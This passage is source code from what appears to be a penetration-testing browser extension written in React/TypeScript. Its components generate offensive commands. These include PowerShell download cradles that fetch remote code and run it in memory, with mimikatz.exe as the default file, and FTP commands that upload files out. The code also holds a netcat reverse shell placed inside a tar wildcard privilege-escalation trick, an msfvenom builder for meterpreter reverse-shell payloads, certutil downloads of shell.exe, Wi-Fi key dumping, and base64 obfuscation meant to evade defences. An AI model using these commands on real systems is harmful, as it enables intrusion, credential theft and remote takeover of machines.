);\r\n if ( hexChar.length < 2 ) {\r\n throw new Error( \"invalid hexadecimal\" );\r\n }\r\n const num = parseInt( hexChar, 16 );\r\n if ( num < 0 || num > 255 ) {\r\n throw new Error( \"invalid hexadecimal\" );\r\n }\r\n str += String.fromCharCode( num );\r\n }\r\n return str;\r\n}\r\n\r\nconst HexEncode = () => {\r\n const [ input, setInput ] = useState( '' );\r\n const [ output, setOutput ] = useState( '' );\r\n const { TextArea } = Input;\r\n const successBase64Copy = () => {\r\n message.success( 'Your payload has been copied successfully !' );\r\n };\r\n const handleChange = ( _name: string ) => ( event: { target: { value: React.SetStateAction } } ) => {\r\n setInput( event.target.value );\r\n };\r\n const handleClick = ( type: string ) => {\r\n if ( type === 'encode' ) {\r\n setOutput( toHex( input ) );\r\n } else if ( type === 'decode' ) {\r\n try {\r\n setOutput( hex2a( input ) );\r\n } catch ( ex ) {\r\n setOutput( 'Unable to decode properly : incorrect Hex' );\r\n message.error( 'Incorrect Base64 please try something else' );\r\n }\r\n }\r\n return;\r\n };\r\n return (\r\n
\r\n
\r\n \r\n Hexadecimal Encoder / Decoder\r\n \r\n \r\n The hexadecimal numeral system, often shortened to \"hex\", is a numeral system made up of 16 symbols\r\n (base 16). The standard numeral system is called decimal (base 10) and uses ten symbols:\r\n 0,1,2,3,4,5,6,7,8,9. Hexadecimal uses the decimal numbers and six extra symbols.\r\n \r\n
\r\n \r\n \r\n \r\n handleClick( 'encode' )}\r\n >\r\n \r\n Encode\r\n \r\n handleClick( 'decode' )}\r\n >\r\n \r\n Decode\r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n setOutput( '' )}\r\n >\r\n Clear\r\n \r\n \r\n \r\n );\r\n};\r\n\r\nexport default HexEncode;\r\n" }, { "path": "src/components/encoding/URLEncode.tsx", "content": "import React, { useState } from 'react';\nimport { Button, Input, Typography, message, Divider } from 'antd';\nimport { CopyOutlined, createFromIconfontCN, ClearOutlined } from '@ant-design/icons';\nimport Clipboard from 'react-clipboard.js';\nimport { escape, unescape } from 'querystring';\n\nconst { Title, Paragraph } = Typography;\nconst IconFont = createFromIconfontCN( {\n scriptUrl: [ './iconfont.js' ]\n} );\n\nconst Base64Encode = () => {\n const [ input, setInput ] = useState( '' );\n const [ output, setOutput ] = useState( '' );\n const { TextArea } = Input;\n const successPayload = () => {\n message.success( 'Your URL has been copied successfully !' );\n };\n const handleChange = ( _name: string ) => ( event: { target: { value: React.SetStateAction } } ) => {\n setInput( event.target.value );\n };\n const handleClick = ( type: string ) => {\n if ( type === 'encode' ) {\n setOutput( escape( input ) );\n } else if ( type === 'decode' ) {\n try {\n setOutput( unescape( input ) );\n } catch ( ex ) {\n setOutput( 'Unable to decode properly : Incorrect base64 :-( ' );\n message.error( 'Incorrect Base64 please try something else' );\n }\n }\n return;\n };\n return (\n
\n
\n \n URL Encoder / Decoder\n \n \n URL encoding is the practice of translating unprintable characters or characters with special\n meaning within URLs to a representation that is unambiguous and universally accepted by web browsers\n and servers.\n \n
\n \n \n \n handleClick( 'encode' )}\n >\n \n Encode\n \n handleClick( 'decode' )}\n >\n \n Decode\n \n
\n \n \n \n \n \n setOutput( '' )}\n >\n Clear\n \n \n \n );\n};\n\nexport default Base64Encode;\n" }, { "path": "src/components/file_transfer/File_transfer.tsx", "content": "import React from 'react';\nimport PersistedState from 'use-persisted-state';\nimport { Typography, Row, Col, Divider, Input, Space } from 'antd';\nimport { WifiOutlined, createFromIconfontCN, FolderOutlined, FileDoneOutlined } from '@ant-design/icons';\nimport { Ipv4TcpCacheState } from \"components/types/Ipv4TcpCacheState\";\nimport Link from 'antd/es/typography/Link';\n\n\nconst { Title, Paragraph, Text } = Typography;\nconst IconFont = createFromIconfontCN( {\n scriptUrl: [ './iconfont.js' ]\n} );\n\nexport default function FileTransfer () {\n const useIPv4State = PersistedState( 'ipv4_tcp_cache' );\n\n const [ values, setValues ] = useIPv4State( {\n ip: '',\n port: '',\n target_file_name: 'http://10.0.0.1/mimikatz.exe',\n output_file_name: 'mimikatz.exe',\n } );\n\n const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {\n setValues( { ...values, [ name ]: event.target.value } );\n };\n\n const fileDownload = `(New-Object Net.WebClient).DownloadFile('${ values.target_file_name }','${ values.output_file_name }')`\n const fileDownloadAsync = `(New-Object Net.WebClient).DownloadFileAsync('${ values.target_file_name }','${ values.output_file_name }')`\n const fileLessIEX = `IEX (New-Object Net.WebClient).DownloadString('${ values.target_file_name }')`\n const fileLessIEXPipe = `(New-Object Net.WebClient).DownloadString('${ values.target_file_name }') | IEX`\n const iwr = `iwr -Uri '${ values.target_file_name }' -OutFile '${ values.output_file_name }'`\n const InvokeWebRequest = `Invoke-WebRequest -Uri '${ values.target_file_name }' -OutFile '${ values.output_file_name }'`\n const copyFromSmb = `copy \\\\\\\\${ values.ip }\\\\${ values.output_file_name }`\n const mountShareWithPasswords = `net use z: \\\\\\\\${ values.ip }\\\\share /user:johnDoe Sup3rP@ssw0rd!`\n const DownloadFromFTP = `(New-Object System.Net.WebClient).DownloadFile('ftp://${ values.ip }/${ values.output_file_name }','${ values.output_file_name }')`\n const scriptFTP = `echo open ${ values.ip } ${ values.port } > ftp.txt\necho USER anonymous >> ftp.txt\necho GET ${ values.output_file_name } >> ftp.txt\necho BYE >> ftp.txt\nftp -v -s:ftp.txt`\n const powershellFTPUpload = `(New-Object System.Net.WebClient).UploadFile('ftp://${ values.ip }/${ values.output_file_name }','C:\\\\Users\\\\Public\\\\${ values.output_file_name }')`\n const scriptUploadFTP = `echo open ${ values.ip } ${ values.port } > ftp.txt\necho USER anonymous >> ftp.txt\necho binary >> ftp.txt\necho PUT ${ values.output_file_name } >> ftp.txt\necho BYE >> ftp.txt\nftp -v -s:ftp.txt`\n\n return (\n
\n
\n \n Windows File Transfer Methods\n \n \n Over the past few years, the Windows operating system has evolved and new versions come with different utilities for file transfer operations. Understanding file transfer in Windows can be helpful to both attackers and defenders alike. Attackers can use various file transfer methods to operate and avoid being caught.\n \n
\n \n \n }\n name='Ip adress'\n placeholder='IP Address or domain (ex: 212.212.111.222)'\n onChange={handleChange( 'ip' )}\n value={values.ip}\n />\n \n \n }\n name='Port'\n placeholder='Port (ex: 1337)'\n onChange={handleChange( 'port' )}\n value={values.port}\n />\n \n \n \n \n }\n name='File name'\n placeholder='URL (ex: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1)'\n onChange={handleChange( 'target_file_name' )}\n value={values.target_file_name}\n />\n\n \n \n }\n name='File name'\n placeholder='Output file (ex: PowerView.ps1)'\n onChange={handleChange( 'output_file_name' )}\n value={values.output_file_name}\n />\n \n \n
\n
\n \n
\n \n \n PowerShell Download File Method\n \n \n We can specify the class name Net.WebClient and the method DownloadFile with the parameters corresponding to the URL of the target file to download and the output file name.\n \n File Download\n \n 
\n                            \n                                {fileDownload}\n                            \n
\n \n \n 
\n                            \n                                {fileDownloadAsync}\n                            \n
\n \n \n
\n \n
\n \n \n PowerShell DownloadString - Fileless Method\n \n \n Fileless attacks work by using some operating system functions to download and execute the payloads. PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression command or the alias IEX\n \n \n 
\n                            \n                                {fileLessIEX}\n                            \n
\n \n \n 
\n                            \n                                {fileLessIEXPipe}\n                            \n
\n \n PowerShell Invoke-WebRequest\n \n From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available, but it is noticeably slower at downloading files. You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.\n \n \n 
\n                            \n                                {InvokeWebRequest}\n                            \n
\n \n \n 
\n                            \n                                {iwr}\n                            \n
\n \n \n
\n \n
\n \n \n SMB Downloads\n \n \n The SMB protocol that runs on port TCP/445 is most commonly found in enterprise networks where Windows services are running. It allows applications and users to transfer files between and between remote servers.\n \n \n We can use SMB to download files from our attacker machine easily. We need to create an SMB server in our machine with smbserver.py from Impacket and then use copy, move, PowerShell Copy-Item, or any other tool that allows connection to SMB.\n \n \n 
\n                            \n                                sudo impacket-smbserver share -smb2support /tmp/smb_share\n                            \n
\n \n \n 
\n                            \n                                {copyFromSmb}\n                            \n
\n \n New versions of Windows block unauthenticated guest access!\n To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our windows target machine:\n \n 
\n                            \n                                sudo impacket-smbserver share -smb2support /tmp/smbshare -user johnDoe -password Sup3rP@ssw0rd!\n                            \n
\n \n \n 
\n                            \n                                {mountShareWithPasswords}\n                            \n
\n \n \n
\n \n
\n \n \n FTP Downloads\n \n \n Another way to transfer files is using FTP (File Transfer Protocol), which use port TCP/21 and TCP/20. We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server.\n \n \n We can configure an FTP Server in our attack host using Python3 pyftpdlib module. It can be installed with the following command:\n \n \n 
\n                            \n                                sudo pip3 install pyftpdlib\n                            \n
\n By default, pyftpdlib uses port 2121. We can change it with the -p / --port option!\n \n \n 
\n                            \n                                sudo python3 -m pyftpdlib --port 21\n                            \n
\n \n Transfering Files from an FTP Server Using PowerShell\n \n 
\n                            \n                                {DownloadFromFTP}\n                            \n
\n \n \n 
\n                            \n                                {scriptFTP}\n                            \n
\n \n \n
\n
\n \n \n FTP Uploads\n \n \n Uploading files using FTP is very similar to downloading files. We can use PowerShell or the FTP client to complete the operation. Before we start our FTP Server using the Python module pyftpdlib, we need to specify the option --write to allow clients to upload files to our attack host.\n \n \n 
\n                            \n                                sudo python3 -m pyftpdlib --port 21 --write\n                            \n
\n \n PowerShell Upload File\n \n 
\n                            \n                                {powershellFTPUpload}\n                            \n
\n \n \n 
\n                            \n                                {scriptUploadFTP}\n                            \n
\n \n \n
\n
\n );\n}" }, { "path": "src/components/file_transfer/ObfuscatedFiles.tsx", "content": "import React, { useState } from 'react';\nimport PersistedState from 'use-persisted-state';\nimport { Button, Input, Typography, message, Divider, Menu, Dropdown, Space } from 'antd';\nimport { CopyOutlined, createFromIconfontCN, ClearOutlined, DownOutlined, FileTextOutlined } from '@ant-design/icons';\nimport { ObfuscatedFile } from 'components/types/ObfuscatedFile';\nimport Clipboard from 'react-clipboard.js';\n\nconst { Title, Paragraph } = Typography;\nconst IconFont = createFromIconfontCN( {\n scriptUrl: [ './iconfont.js' ]\n} );\n\nconst EchoBase64 = () => {\n const [ output, setOutput ] = useState( '' );\n const echoFileName = PersistedState( 'echo_file_name' );\n const { TextArea } = Input;\n\n const [ values, setValues ] = echoFileName( {\n name: '',\n input: ''\n } );\n\n const successBase64Copy = () => {\n message.success( 'Your payload has been copied successfully !' );\n };\n\n const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {\n setValues( { ...values, [ name ]: event.target.value } );\n };\n\n const randomString = ( length = 10 ) => {\n const chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';\n let result = '';\n if ( length > chars.length ) {\n return 'An error occurred';\n }\n for ( let i = 0; i < length; i++ ) {\n const randomNumber = Math.floor( Math.random() * chars.length );\n if ( randomNumber ) {\n result += chars[ randomNumber ];\n } else {\n return 'An error occurred';\n }\n }\n return result;\n };\n\n const handleClick = () => {\n try {\n if ( values.input.length === 0 ) {\n message.error( 'Please enter some text to encode' );\n return;\n }\n if ( encMode === 'Base64 - Bash' ) {\n const bash_b64 = btoa( values.input );\n setOutput( `echo -n '${ bash_b64 }' | base64 -d > ${ values.name }` );\n }\n if ( encMode === 'Base64 - CMD' ) {\n const cmd_b64 = btoa( values.input );\n const cmd_random = randomString();\n setOutput( `echo|set /p=\"${ cmd_b64 }\" >> ${ cmd_random } \ncertutil -decode ${ cmd_random } ${ values.name }\ndel /Q ${ cmd_random }` );\n }\n if ( encMode === 'Base64 - Powershell' ) {\n const pwsh_b64 = btoa( values.input );\n const pwsh_random = randomString();\n setOutput( `${ \"$\" + pwsh_random } = @()\n${ \"$\" + pwsh_random } +=\n[System.Convert]::FromBase64String(\"${ pwsh_b64 }\")\n[Environment]::CurrentDirectory = (Get-Location -PSProvider FileSystem).ProviderPath\n[System.IO.File]::WriteAllBytes(\"${ values.name }\", ${ \"$\" + pwsh_random })\nRemove-Variable ${ pwsh_random }` );\n }\n }\n catch ( ex ) {\n message.error( 'Unable to encode properly please try again' );\n }\n return;\n\n }\n\n const [ encMode, setEncmode ] = useState( 'Base64 - Bash' );\n\n const handleEncModeList = ( type: { key: React.SetStateAction } ) => {\n setEncmode( type.key.toString() );\n };\n\n const menu = (\n \n Base64 - Bash\n \n Base64 - CMD\n \n Base64 - Powershell\n \n );\n\n return (\n
\n
\n \n Obfuscated Files or Information\n \n \n Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n \n
\n \n \n \n\n \n \n {encMode} \n \n \n \n handleClick()}\n >\n \n Encode\n \n\n }\n onChange={handleChange( 'name' )}\n placeholder=\"Output File Name\"\n bordered={false}\n value={values.name}\n style={{ marginTop: 6 }}\n />\n \n
\n \n \n \n \n \n setOutput( '' )}\n >\n Clear\n \n \n \n );\n};\n\nexport default EchoBase64;\n" }, { "path": "src/components/http_utils/HTTP-Utils.tsx", "content": "import React, { useState } from 'react';\nimport {\n Button,\n Typography,\n Row,\n Col,\n Input,\n Select,\n Divider,\n Tag,\n message,\n Descriptions,\n Modal,\n Tabs,\n Alert\n} from 'antd';\nimport { SendOutlined, FullscreenOutlined, ArrowsAltOutlined, DeleteOutlined } from '@ant-design/icons';\nimport { vs2015 } from 'react-syntax-highlighter/dist/esm/styles/hljs';\nimport axios, { Method } from 'axios';\nimport PersistedState from 'use-persisted-state';\nimport SyntaxHighlighter from 'react-syntax-highlighter';\nimport pretty from 'pretty';\n\nconst { Title, Paragraph } = Typography;\nconst { TabPane } = Tabs;\nconst { TextArea } = Input;\nconst { Option } = Select;\n\nexport default function LinuxCommands () {\n const http_url = PersistedState( 'http_url_repeater' );\n const [ isModalVisible, setIsModalVisible ] = useState( false );\n\n const windowMode = () => {\n const width = 1100;\n const height = 800;\n\n chrome.windows.create( {\n url: chrome.runtime.getURL( 'index.html' ),\n width: width,\n height: height,\n type: 'popup'\n } );\n };\n const target = window.location.href;\n const showModal = () => {\n setIsModalVisible( true );\n };\n const handleClose = () => {\n setIsModalVisible( false );\n };\n\n interface IHTTP_UtilsProps {\n url: string;\n protocol: string;\n type: string;\n }\n\n const [ values, setValues ] = http_url( {\n url: '',\n protocol: 'http://',\n type: 'GET'\n } );\n const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {\n setValues( { ...values, [ name ]: event.target.value } );\n };\n const handleChangeSelect = ( name: string ) => ( event: string ) => {\n setValues( { ...values, [ name ]: event } );\n };\n\n interface ContentProps {\n status: string | number;\n statusText: string;\n headers: {\n [ key: string ]: string;\n };\n data: string;\n }\n // Axios fetch\n const key = 'updatable';\n const [ content, setContent ] = useState();\n const [ headerContent, setHeaderContent ] = useState( [] );\n const [ commentResponse, setCommentResponse ] = useState( [] );\n const [ inputResponse, setInputResponse ] = useState( [] );\n const [ _, setLoading ] = useState();\n const handleDelete = () => {\n setContent( undefined );\n setHeaderContent( [] );\n setCommentResponse( [] );\n setInputResponse( [] );\n values.url = '';\n };\n\n const fetchData = async () => {\n message.loading( { content: 'Loading...', key } );\n await axios( {\n method: values.type as Method,\n url: values.protocol + values.url.replace( /https?:\\/\\//, '' ),\n headers: {}\n } )\n .then( ( res: React.ComponentState ) => {\n setLoading( false ); // Set the loading to false\n setContent( res ); // Axios response\n message.success( { content: 'Loaded!', key } );\n setHeaderContent( res.headers[ 'content-type' ] ); // Header content\n console.log( res );\n const commentOnlyRegex = res.data.match(\n RegExp( /(\\/\\*[\\w\\'\\s\\r\\n\\*]*\\*\\/)|(\\/\\/[\\w\\s\\']*)|(\\\\/]*\\>)/, 'g' )\n );\n if ( commentOnlyRegex != null ) setCommentResponse( commentOnlyRegex );\n const inputOnlyRegex = res.data.match( RegExp( //, 'g' ) );\n if ( inputOnlyRegex != null ) setInputResponse( inputOnlyRegex );\n } )\n .catch( ( err ) => {\n console.log( err );\n message.error( { content: err.message, key } );\n } );\n };\n\n return (\n
\n \n HTTP Repeater\n \n \n HTTP Repeater is a simple tool for manually manipulating and reissuing individual HTTP and WebSocket\n messages, and analyzing the application's responses. You can use Repeater for all kinds of purposes,\n such as changing parameter values to test for input-based vulnerabilities, issuing requests in a\n specific sequence to test for logic flaws.\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n fetchData()}\n allowClear\n value={values.url.replace( /https?:\\/\\//, '' )}\n placeholder='http://10.10.14.15:1337/home?a=1 OR example.com'\n />\n \n \n \n \n \n \n \n \n \n
\n \n \n {/* {pretty( content.data ) || 
No response
} */}\n \n \n {!commentResponse && (\n \n {commentResponse.map(\n (\n matches:\n | string\n | number\n | boolean\n | {}\n | React.ReactElement>\n | React.ReactPortal\n | null\n | undefined\n ) => {\n return (\n \n {/* aa{matches}; */}\n \n );\n }\n )}\n \n )}\n {!inputResponse && (\n \n {inputResponse.map( ( matches: string ) => {\n return (\n \n {pretty( matches )};\n \n );\n } )}\n \n )}\n \n
\n ) : (\n
\n \n }\n style={{ marginTop: 15 }}\n type='link'\n danger\n >\n \n Fullscreen mode\n \n \n }\n onClick={() => windowMode()}\n type='link'\n >\n Pop-up mode\n \n
\n )}\n
\n );\n}\n" }, { "path": "src/components/linux/LinuxCommands.tsx", "content": "import React from 'react';\nimport { Typography, Divider, Button, Collapse } from 'antd';\nimport { ArrowsAltOutlined } from '@ant-design/icons';\n\nconst { Title, Paragraph, Text } = Typography;\nconst { Panel } = Collapse;\n\nexport default function LinuxCommands () {\n const Suid = [\n { title: 'find / -user root -perm /4000 2>/dev/null' },\n { title: 'find / -perm -u=s -type f 2>/dev/null' },\n { title: \"find / -type f -name '*.txt' 2>/dev/null\" },\n { title: 'find / -user root -perm -4000 -exec ls -ldb {} \\; > /tmp/suid' },\n { title: 'getcap -r / 2>/dev/null' }\n ];\n const VersionSystem = [\n { title: 'cat /etc/issue' },\n { title: 'cat /etc/*-release' },\n { title: 'cat /etc/lsb-release' },\n { title: 'cat /etc/redhat-release' }\n ];\n const KernelVersion = [\n { title: 'cat /proc/version' },\n { title: 'uname -a' },\n { title: 'uname -mrs' },\n { title: 'rpm -q kernel' },\n { title: 'dmesg | grep Linux' },\n { title: 'ls /boot | grep vmlinuz' }\n ];\n const EnvironmentVariables = [\n { title: 'cat /etc/profile' },\n { title: 'cat /etc/bashrc' },\n { title: 'cat ~/.bash_profile' },\n { title: 'cat ~/.bashrc' },\n { title: 'cat ~/.bash_logout' },\n { title: 'env' },\n { title: 'set' }\n ];\n const ServiceSettings = [\n { title: 'cat /etc/syslog.conf' },\n { title: 'cat /etc/chttp.conf' },\n { title: 'cat /etc/lighttpd.conf' },\n { title: 'cat /etc/cups/cupsd.conf' },\n { title: 'cat /etc/inetd.conf' },\n { title: 'cat /etc/apache2/apache2.conf' },\n { title: 'cat /etc/my.conf' },\n { title: 'cat /etc/httpd/conf/httpd.conf' },\n { title: 'cat /opt/lampp/etc/httpd.conf' },\n { title: \"ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'\" }\n ];\n const CronJobs = [\n { title: 'crontab -l' },\n { title: 'ls -alh /var/spool/cron' },\n { title: 'ls -al /etc/ | grep cron' },\n { title: 'ls -al /etc/cron*' },\n { title: 'cat /etc/cron*' },\n { title: 'cat /etc/at.allow' },\n { title: 'cat /etc/at.deny' },\n { title: 'cat /etc/cron.allow' },\n { title: 'cat /etc/cron.deny' },\n { title: 'cat /etc/crontab' },\n { title: 'cat /etc/anacrontab' },\n { title: 'cat /var/spool/cron/crontabs/root' }\n ];\n const UsersHost = [\n { title: 'lsof -i' },\n { title: 'lsof -i :80' },\n { title: 'grep 80 /etc/services' },\n { title: 'netstat -antup' },\n { title: 'netstat -antpx' },\n { title: 'netstat -tulpn' },\n { title: 'chkconfig --list' },\n { title: 'chkconfig --list | grep 3:on' },\n { title: 'last' },\n { title: 'lastlog' }\n ];\n const PortForwarding = [\n {\n title: 'FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]'\n },\n { title: 'FPipe.exe -l 80 -r 80 -s 80 192.168.1.7' },\n {\n title: 'ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]'\n },\n { title: 'ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port' },\n { title: 'ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port' },\n {\n title: 'mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe'\n },\n {\n title: 'mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay'\n },\n {\n title:\n 'mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)'\n },\n { title: 'backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc' },\n {\n title: 'localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)'\n }\n ];\n const wildcardPrivesc = [\n {\n title: `echo \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f\" > shell.sh`\n },\n {\n title: `touch \"/var/www/html/--checkpoint-action=exec=sh shell.sh\"`\n },\n {\n title: `touch \"/var/www/html/--checkpoint=1\"`\n }\n ];\n return (\n
\n \n Useful Linux command for your Penetration Testing\n \n List of useful commands on Linux\n Script to check every misconfigurations\n \n \n \n
\n \n \n \n SUID Commands\n
\n {Suid.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n What version of the system ?\n
\n {VersionSystem.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n What is its kernel version ?\n
\n {KernelVersion.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n What is the environment variables ?\n
\n {EnvironmentVariables.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n Service settings, there is any wrong allocation?\n
\n {ServiceSettings.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n Is there any cron jobs ?\n
\n {CronJobs.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n Other users host communication with the system ?\n
\n {UsersHost.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n How to port forward ?\n
\n {PortForwarding.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n TAR wildcard cronjob privilege escalation\n
\n {wildcardPrivesc.map( ( k, i ) => {\n return (\n \n 
{k.title}
\n \n );\n } )}\n
\n
\n );\n}\n" }, { "path": "src/components/linux/MSFBuilder.tsx", "content": "import React from 'react';\nimport { Input, Typography, Row, Divider, Select, Form, Col, Collapse } from 'antd';\nimport PersistedState from 'use-persisted-state';\nimport { MSFBuilder } from 'components/types/MSFBuilder';\n\nconst { Title, Paragraph } = Typography;\n\nconst MSFBuilder = () => {\n // LocalStorage stuff\n const msfVenomBuilder = PersistedState( 'msfVenomBuilder' );\n\n // Antd stuff\n const { Option } = Select;\n const { Panel } = Collapse;\n const { Text } = Typography;\n\n let payloads = require( '../../assets/data/Payloads.json' );\n let encoder = require( '../../assets/data/Encoder.json' );\n let platform = require( '../../assets/data/Platform.json' );\n let format = require( '../../assets/data/Format.json' );\n\n const [ values, setValues ] = msfVenomBuilder( {\n Payload: 'windows/meterpreter/bind_tcp',\n LHOST: '10.10.13.37',\n LPORT: '4444',\n Encoder: 'generic/none',\n EncoderIterations: '4',\n Platform: 'windows',\n Arch: 'x64',\n NOP: '200',\n BadCharacters: \"badchars\",\n Format: 'exe',\n Outfile: 'reverse_shell.exe'\n } );\n\n const { LHOST, LPORT, Platform, Arch, NOP, Encoder,\n EncoderIterations, BadCharacters, Format, Outfile } = values;\n\n const launchCommand = `msfconsole -qx \"use exploit/multi/handler; set PAYLOAD ${ values.Payload }; set LHOST ${ values.LHOST }; set LPORT ${ values.LPORT }; run\"`;\n\n const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {\n setValues( { ...values, [ name ]: event.target.value } );\n };\n\n const handleChangeSelect = ( prop: string ) => ( data: any ) => {\n setValues( { ...values, [ prop ]: data } );\n };\n\n const generateCommand = ( values ) => {\n const options = [\n LHOST && `LHOST=${ LHOST }`,\n LPORT && `LPORT=${ LPORT }`,\n Platform && `--platform ${ Platform }`,\n Arch && `-a ${ Arch }`,\n NOP && `-n ${ NOP }`,\n Encoder && `-e ${ Encoder }`,\n EncoderIterations && `-i ${ EncoderIterations }`,\n BadCharacters && `-b \"${ BadCharacters }\"`,\n Format && `-f ${ Format }`,\n Outfile && `-o ${ Outfile }`\n ].filter( Boolean );\n\n if ( !values.Payload ) {\n return '';\n }\n\n const command = `msfvenom -p ${ values.Payload } ${ options.join( ' ' ) }`;\n return command;\n }\n\n return (\n
\n
\n \n MSF Venom Builder\n \n \n Msfvenom is a command line instance of Metasploit that is used to generate and output all of the\n various types of shell code that are available in Metasploit.\n \n
\n \n \n
\n \n \n option.value.toString().toUpperCase().indexOf( inputValue.toUpperCase() ) !== -1\n }\n >\n {payloads.map(\n (\n data: {\n value:\n | boolean\n | React.ReactFragment\n | React.ReactPortal\n | null\n | undefined;\n },\n key: string | number\n ) => {\n return ;\n }\n )}\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n option.value.toUpperCase().indexOf( inputValue.toUpperCase() ) !== -1}\n >\n {encoder.map(\n (\n data: {\n value:\n | boolean\n | React.ReactFragment\n | React.ReactPortal\n | null\n | undefined;\n },\n key: string | number\n ) => {\n return ;\n }\n )}\n \n \n \n \n \n \n \n \n \n \n \n \n
\n \n \n \n \n option.value.toUpperCase().indexOf( inputValue.toUpperCase() ) !== -1}\n >\n {platform.map(\n (\n data: {\n value: boolean | React.ReactFragment | React.ReactPortal;\n },\n key: string | number\n ) => {\n return ;\n }\n )}\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n option.value.toUpperCase().indexOf( inputValue.toUpperCase() ) !== -1}\n >\n {format.map(\n (\n data: {\n value:\n | boolean\n | React.ReactFragment\n | React.ReactPortal\n | null\n | undefined;\n },\n key: string | number\n ) => {\n return ;\n }\n )}\n \n \n \n \n \n \n \n \n \n \n \n \n 
\n                                \n                                    {generateCommand( values )}\n                                \n
\n \n \n \n \n 
\n                                {launchCommand}\n
\n \n \n \n \n 
\n                                \n                                    {`use exploit/multi/handler\nset PAYLOAD ${ values.Payload }\nset LHOST ${ values.LHOST }\nset LPORT ${ values.LPORT }\nrun`}\n                                \n
\n \n \n \n
\n \n );\n};\n\nexport default MSFBuilder;\n" }, { "path": "src/components/linux/PowershellCommands.tsx", "content": "import React from 'react';\nimport { Typography, Divider, Button, message } from 'antd';\nimport SyntaxHighlighter from 'react-syntax-highlighter';\nimport { vs2015 } from 'react-syntax-highlighter/dist/esm/styles/hljs';\nimport Clipboard from 'react-clipboard.js';\nimport { CopyOutlined } from '@ant-design/icons';\n\nconst { Title, Paragraph, Text } = Typography;\n\nexport default function PowershellCommands () {\n const successInfoReverseShell = () => {\n message.success( 'The script has been copied successfully !' );\n };\n const local_sys_enum = [\n { title: 'systeminfo' },\n { title: 'Get-WmiObject Win32_ComputerSystem' },\n { title: 'echo \"$env:COMPUTERNAME.$env:USERDNSDOMAIN\"' }\n ];\n const lastpatchlist = 'Get-Hotfix -description \"Security update\"';\n const lastpatchlist_wmic = 'wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn';\n const envVar = 'Get-ChildItem Env: | ft Key,Value';\n const envVar_cmd = 'set';\n const wlan_creddump = [\n { title: 'netsh wlan show profiles' },\n { title: 'netsh wlan show profile name=\"PROFILE-NAME\" key=clear' }\n ];\n\n // windows wget like\n const powershell_http_dl = 'Invoke-WebRequest \"http://10.10.10.10/shell.exe\" -OutFile \"shell.exe\" ';\n const cmd_cert_http_dl = 'certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe';\n\n // require powerview\n const power_view_repo: string =\n 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1';\n\n // domain enum\n const domain_name = `Get-NetDomain`;\n const forest_domain_list = `Get-NetForestDomain`;\n const domain_SID = `Get-DomainSID `;\n const domain_Policy = `Get-DomainPolicy`;\n const domain_OUs = `Get-NetOU`;\n const domain_trust = `Get-NetDomainTrust`;\n // gpo\n const gpo_enum = `Get-NetGPO -ComputerName computername.domain.com`;\n // passwd enum\n const passwd_lastset = `Get-UserProperty -Properties pwdlastset`;\n const user_desc_harvest = `Find-UserField -SearchField Description -SearchTerm “pass”`;\n\n //computers domain\n const domain_computers = `Get-NetComputer`;\n const domain_pingable_computers = `Get-NetComputer -Ping`;\n const domain_win7U_computers = `Get-NetComputer -OperatingSystem \"Windows 7 Ultimate\"`;\n\n //domain admins\n const domain_admin_members = `Get-NetGroupMember -GroupName \"Domain Admins\"`;\n const domain_admins_groups = `Get-NetGroup *admin*`;\n const local_admins = `Get-NetLocalGroup -ComputerName PCNAME-001`;\n const user_group_membership = `Get-NetGroup -UserName \"username\"`;\n\n //acl\n const ACL_user_enum = `Get-ObjectAcl -SamAccountName \"users\" -ResolveGUIDs`;\n const ACL_gpoedit_rights = `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}`;\n const ACL_passwd_edit_rights = `Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter 